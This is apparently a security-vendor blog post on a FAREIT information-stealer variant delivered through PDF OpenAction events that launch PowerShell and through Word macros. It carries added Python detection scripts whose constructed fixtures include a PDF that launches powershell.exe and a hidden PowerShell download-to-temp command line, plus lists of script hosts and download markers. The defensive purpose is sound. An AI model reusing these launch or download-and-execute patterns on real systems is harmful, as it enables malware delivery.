By Ian Lagrazon and Jaaziel Carlos

In 2014, we began seeing attacks that abused Windows PowerShell. Back then, it was uncommon for malware to use this particular feature of Windows. However, there are several reasons for an attacker to use this scripting technique.

For one, users cannot easily spot any malicious behavior, since PowerShell runs in the background. Another is that PowerShell can be used to steal usernames, passwords, and other system information without an executable file being present. This makes it an attractive tool for attackers who want to carry out malicious activities while avoiding easy detection.

In March 2016, we noted that the PowerWare crypto-ransomware also abused PowerShell. Recently, we spotted a new attack in which PowerShell was abused to deliver a FAREIT variant. This family of information stealers has been around since 2011.

New spin on common delivery methods

Like its predecessors, this latest FAREIT variant is delivered via malicious email attachments. Users receive an email with either a malicious .PDF file that abuses Windows PowerShell or a Word document containing malicious macro code.

Figure 1. FAREIT-related spam emails use typical subjects like billing reminder and purchase order

Figure 2. Document containing malicious macro

Figure 3. Malicious PDF exploiting Windows PowerShell

If a user opens the malicious PDF attachment, the PDF launches Windows PowerShell via its OpenAction event to perform its malicious routine. This leads to the download of TSPY_FAREIT onto the system, which steals a plethora of information: credentials (usernames and passwords) stored in certain browsers, stored email credentials, and bitcoin-related details, among others.
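To show how a defender can triage an attachment like the one in Figure 3, here is an added example in Python (not code from the original post or from Trend Micro). It locates a PDF's /OpenAction entry, resolves it whether it is written as a direct dictionary or as an indirect object reference, and reports whether the action is a /Launch aimed at a script interpreter. The two PDF fixtures are constructed for this example: they are bare object skeletons rather than renderable documents, and the hypothetical Launch action names powershell.exe with no arguments.

```python
import re

# Constructed fixture (not a real sample): a bare PDF object skeleton, not a
# renderable file, whose /OpenAction is an indirect reference to a /Launch action
# that names powershell.exe with no arguments. It exists only to exercise the scanner.
LAUNCH_PDF = b"""%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [] /Count 0 >>
endobj
3 0 obj
<< /S /Launch /Win << /F (powershell.exe) >> >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""

# Constructed benign fixture: /OpenAction given as a direct dictionary that only
# jumps to a page destination, the common legitimate use of OpenAction.
GOTO_PDF = b"""%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction << /S /GoTo /D [4 0 R /Fit] >> >>
endobj
%%EOF
"""

# Interpreters whose appearance as a /Launch target warrants an alert.
INTERPRETERS = ("powershell", "cmd.exe", "wscript", "cscript", "mshta")


def read_dict(data: bytes, start: int) -> bytes:
    """Return the balanced << ... >> dictionary that begins at data[start]."""
    if not data.startswith(b"<<", start):
        raise ValueError("no dictionary at offset %d" % start)
    depth, i = 0, start
    while i < len(data) - 1:
        pair = data[i:i + 2]
        if pair == b"<<":
            depth, i = depth + 1, i + 2
        elif pair == b">>":
            depth, i = depth - 1, i + 2
            if depth == 0:
                return data[start:i]
        else:
            i += 1
    raise ValueError("unbalanced dictionary")


def open_action(data: bytes) -> bytes:
    """Locate /OpenAction and return the action dictionary it points to (b"" if none)."""
    m = re.search(rb"/OpenAction\s*", data)
    if not m:
        return b""
    if data.startswith(b"<<", m.end()):                    # direct dictionary
        return read_dict(data, m.end())
    ref = re.match(rb"(\d+)\s+\d+\s+R", data[m.end():])   # indirect reference "N G R"
    if not ref:
        return b""
    obj = re.search(rb"(?<![0-9])" + ref.group(1) + rb"\s+\d+\s+obj\s*", data)
    return read_dict(data, obj.end()) if obj else b""


def scan_pdf(data: bytes) -> dict:
    """Summarise the open action and flag /Launch targets that are script interpreters."""
    action = open_action(data)
    result = {"has_open_action": bool(action), "action_type": None,
              "launch_target": None, "suspicious": False}
    if not action:
        return result
    kind = re.search(rb"/S\s*/(\w+)", action)
    result["action_type"] = kind.group(1).decode() if kind else None
    if result["action_type"] == "Launch":
        target = re.search(rb"/F\s*\((.*?)\)", action)
        name = target.group(1).decode(errors="replace") if target else ""
        result["launch_target"] = name
        # Any Launch deserves a look; one naming an interpreter is the pattern described above.
        result["suspicious"] = any(k in name.lower() for k in INTERPRETERS)
    return result


if __name__ == "__main__":
    for label, blob in (("launch", LAUNCH_PDF), ("goto", GOTO_PDF)):
        print(label, scan_pdf(blob))
```

The scanner only sees objects stored uncompressed; a real triage step first decompresses object streams (Didier Stevens' pdf-parser does this) and also inspects /AA (additional actions) entries, since an action can be attached to a page or annotation rather than to the catalog.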

On the other hand, if a user opens the infected Word document and enables Word’s macro feature, the malicious macro drops and executes TSPY_FAREIT. While there is nothing unique about the final FAREIT payload’s routine, we can see how cyber crooks employed these Microsoft features to carry out their nefarious activities.

Securing your data

More and more, we are seeing threats that abuse PowerShell, such as FAREIT and PowerWare. The difference between the two is that PowerWare uses a macro first, which then runs PowerShell with parameters that carry the malicious code. FAREIT’s malicious PDF, on the other hand, uses the OpenAction event to run PowerShell directly, with the malicious code in its parameters.
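Whichever lure is used, both delivery paths described above end the same way on the endpoint: a document reader (the PDF viewer for the OpenAction case, Word for the macro case) spawns PowerShell, or Word runs an executable the macro has just dropped. The following Python script is an added example, not part of the original post, that applies three process-lineage rules to Sysmon-style process-creation records. The records, their one-line `Image=...|CommandLine=...|ParentImage=...` layout, the file paths and the example.invalid URL are all constructed for this example.

```python
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Constructed process-creation records (not real telemetry). The field order is fixed:
# Image | CommandLine | ParentImage, named after the Sysmon Event ID 1 fields.
SAMPLE_LOG = r"""
Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -WindowStyle Hidden -NoProfile -Command "(New-Object Net.WebClient).DownloadFile('http://example.invalid/a', 'C:\Users\u\AppData\Local\Temp\a.exe')"|ParentImage=C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Image=C:\Users\u\AppData\Local\Temp\invoice_9832.exe|CommandLine="C:\Users\u\AppData\Local\Temp\invoice_9832.exe"|ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -NoProfile -File C:\Scripts\inventory.ps1|ParentImage=C:\Windows\explorer.exe
Image=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|CommandLine="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n|ParentImage=C:\Windows\explorer.exe
""".strip().splitlines()


@dataclass
class ProcEvent:
    image: str
    cmdline: str
    parent: str

    @property
    def name(self) -> str:
        return PureWindowsPath(self.image).name.lower()

    @property
    def parent_name(self) -> str:
        return PureWindowsPath(self.parent).name.lower()


DOCUMENT_READERS = {"winword.exe", "excel.exe", "powerpnt.exe", "acrord32.exe", "acrobat.exe", "foxitreader.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOAD_MARKERS = ("downloadfile", "downloadstring", "invoke-webrequest", "net.webclient", "bitstransfer")
HIDDEN_MARKERS = ("-w hidden", "-windowstyle hidden", "-enc ", "-encodedcommand", "-ec ")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\users\\public\\")

LINE_RE = re.compile(r"^Image=(?P<image>.*?)\|CommandLine=(?P<cmd>.*)\|ParentImage=(?P<parent>.*)$")


def parse_line(line: str) -> ProcEvent:
    """Parse one constructed record into its three fields."""
    m = LINE_RE.match(line)
    if not m:
        raise ValueError("unrecognised record: " + line[:60])
    return ProcEvent(m["image"], m["cmd"], m["parent"])


def evaluate(ev: ProcEvent) -> list:
    """Return the names of the lineage rules this event trips (empty list if none)."""
    hits = []
    cmd = ev.cmdline.lower()
    from_reader = ev.parent_name in DOCUMENT_READERS
    # Rule 1: a document reader has no business starting a script host (covers both vectors).
    if from_reader and ev.name in SCRIPT_HOSTS:
        hits.append("script_host_spawned_by_document_reader")
    # Rule 2: PowerShell hiding its window or pulling content from the network.
    if ev.name in {"powershell.exe", "pwsh.exe"} and (
            any(k in cmd for k in DOWNLOAD_MARKERS) or any(k in cmd for k in HIDDEN_MARKERS)):
        hits.append("powershell_download_or_hidden")
    # Rule 3: a reader executing something from a user-writable path (the macro's drop-and-run step).
    if from_reader and ev.name not in SCRIPT_HOSTS and any(p in ev.image.lower() for p in USER_WRITABLE):
        hits.append("document_reader_ran_dropped_executable")
    return hits


def triage(lines) -> list:
    """Evaluate every record and return only those that tripped at least one rule."""
    alerts = []
    for line in lines:
        ev = parse_line(line)
        rules = evaluate(ev)
        if rules:
            alerts.append({"image": ev.name, "parent": ev.parent_name, "rules": rules})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_LOG):
        print(alert)
```

Rule 1 fires on the first record without needing to know anything about the command line, which is the point of lineage rules: the PDF OpenAction path and the macro path produce different documents but the same parent-child pair. The third record, an administrator's inventory script started from Explorer, trips nothing, and the rule set should be tuned against a baseline of legitimate reader and Office activity before it is used for alerting.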

On separate occasions, cyber crooks have proven the effectiveness of these tactics, whether for social engineering purposes or for further infection. Macros usually require user intervention, but with effective lures, attackers are able to trick users into executing the malware.

As both PDFs and macros are used in most organizations and enterprises, employees are quite susceptible to falling for FAREIT. Users are advised to install security software that can detect spammed messages and malicious files related to this threat.

Trend Micro endpoint solutions such as Trend Micro™ Security, Trend Micro™ Smart Protection Suites, and Trend Micro Worry-Free™ Business Security can protect users’ systems from FAREIT malware by detecting the malicious files and related spam emails used by this FAREIT variant.

TippingPoint also mitigates this threat by making the following filters available to its customers:

9536: Backdoor: Zeus Botnet Command and Control Phone Home Request

16662: HTTP: Possible Malware Communication Attempt

With additional insight from Jack Tang

Here are the SHA1 hashes related to this attack: